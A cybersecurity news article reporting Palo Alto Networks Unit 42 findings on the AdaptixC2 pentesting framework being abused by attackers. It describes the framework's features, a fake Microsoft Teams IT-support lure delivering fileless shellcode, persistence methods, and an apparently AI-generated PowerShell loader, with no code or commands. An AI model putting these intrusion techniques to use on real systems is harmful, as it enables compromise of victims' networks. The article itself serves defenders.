AdaptixC2: The Open-Source Pentesting Tool Now Used by Hackers
Researchers at Palo Alto Networks have reported a surge in attacks leveraging the open-source platform AdaptixC2, originally designed for penetration testing but now increasingly exploited by cybercriminals. Unit 42 specialists first detected traces of its malicious use in May 2025 while investigating incidents in corporate networks.
Unlike well-known frameworks for managing compromised machines, AdaptixC2 long remained in the shadows, rarely surfacing in real-world attacks. Recent developments, however, reveal that threat actors are rapidly adapting it to their own malicious playbooks.
Built on a modular architecture, AdaptixC2 was intended to emulate adversary actions during offensive command exercises. Its interface presents agents and sessions in a clear, visual format, making infrastructure management more intuitive. The feature set encompasses arbitrary command execution, file transfers, data exfiltration, and active connection management.
For deployed agents, both x86 and x64 builds are available, which can be compiled as standalone executables, libraries, service components, or pure shellcode. Core functions include directory browsing, file creation and deletion, process management, and execution of arbitrary binaries.
To ensure covert communications, the framework supports SOCKS4/5 proxies, port forwarding, and adjustable block sizes, enabling traffic to blend with legitimate flows. Extender modules allow the integration of custom payloads and evasion techniques, while Beacon Object File (BOF) support enables execution of C-based modules directly in an agent’s memory. Each instance’s configuration is RC4-encrypted, containing block size, encrypted data, and a 16-byte key.
AdaptixC2 supports three communication profiles — HTTP, SMB, and TCP. Among documented intrusions, HTTP proved the most commonly used, with attackers customizing server parameters, port numbers, SSL usage, HTTP methods, URIs, header sets, and User-Agent strings.
In one campaign, attackers distributed malware through fraudulent Microsoft Teams messages impersonating IT support. Victims were persuaded to initiate a Quick Assist session, which facilitated the delivery of a multi-stage PowerShell script. This script retrieved XOR-encoded shellcode from a legitimate hosting service, decrypted it in memory, and executed it via .NET dynamic invocation, thus avoiding disk writes.
Persistence was achieved by creating a startup shortcut. Once installed, attackers conducted reconnaissance using tools such as nltest.exe, whoami.exe, and ipconfig.exe, before establishing a stable command-and-control channel.
In another case, a PowerShell script — believed to have been generated with the help of a neural network — deployed a Base64-encoded AdaptixC2 binary into a dedicated memory region and activated it using VirtualProtect.
To maintain access, adversaries employed DLL hijacking within the Templates directory and registry autorun entries. Distinctive indicators — such as numbered comments, checkmark-style status messages, and specific detection triggers — pointed to automated code generation. This incident demonstrated how AI can accelerate the creation of sophisticated, fileless loaders.
The emergence of AdaptixC2 in real-world intrusions highlights a troubling trend: tools built for penetration testing are being repurposed into fully fledged weapons. Experts advise defenders to closely monitor scenarios where code executes solely in memory via dynamic invocation, and to analyze RC4-encrypted configurations to uncover adversary infrastructure. Particular attention should also be given to the detection of hidden proxy tunnels and port forwarding — capabilities that AdaptixC2 heavily employs.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
